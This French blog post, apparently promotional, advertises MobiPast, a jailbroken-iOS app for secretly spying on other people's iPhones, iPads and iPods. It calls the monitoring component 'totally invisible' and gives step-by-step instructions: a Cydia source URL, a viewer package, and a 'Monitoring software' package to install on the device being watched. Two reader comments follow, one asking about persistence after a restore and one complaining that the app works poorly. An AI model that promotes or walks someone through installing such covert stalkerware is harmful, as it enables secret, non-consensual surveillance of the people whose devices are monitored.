MobiPast est une toute nouvelle application disponible sur Cydia qui va vous permettre d’espionner gratuitement un nombre illimité d’iPhone, iPad ou iPod Touch.
Vous pourrez alors consulter toutes les données copiées de l’appareil équipé du logiciel de surveillance totalement invisible MobiPast directement depuis votre appareil iOS.
La version gratuite de MobiPast permet d’accéder aux fonctionnalités suivantes :
La version complète ajoute les possibilités ci-après :
L’avantage par rapport aux autres softs d’espionnages que l’on peut trouver sur la toile est que toutes les données enregistrées par MobiPast et envoyées sur l’application transitent par votre compte email Yahoo ou Gmail (par emails cryptés) et non par un serveur pour une sécurité et une confidentialité maximales.
1) Lancez Cydia, puis ajoutez la source : http://123.mobipast.com
2) Patientez, puis installez le paquet intitulé « MobiPast application » via cette source.
3) Relancez le springboard, et vous devriez alors posséder l’application !
4) Lancez-la, puis rendez-vous dans l’onglet de compte.
5) Appuyez sur « Connexion », et rentrez enfin votre adresse email et votre mot de passe Gmail ou Yahoo pour recevoir vos données.
Sur l’appareil à espionner, il suffit d’installer l’autre paquet de la source, intitulé « Monitoring software ». Retrouvez le tutoriel complet sur Mobipast.com.
Pour aller plus loin, suivez l’actualité, les tutoriaux, les mises à jour et discutez de l’application MobiPast sur le blog officiel.
Voir les commentaires
Bonjour, je voudrais savoir si lors d'une éventuelle restauration du système, l'application reste t'elle toujours présente ? Merci
Franchement je vous le déconseille, cela fonctionne mal et rien en gratuit, le GPS n'a jamais fonctionné et les sms ne sont pas lisibles ou peut-être en payant mais à 29.99€ les 30 jours aïe aïe aïe ......
L'apothéose a été la quand le téléphone "espionné" s'est mis à mettre des messages bizarres et qu'il a fallu une manip pour les retirer, ce qui a retirer les "droits" du Logiciel et donc plus d'espionnage sur le téléphone "espion" ...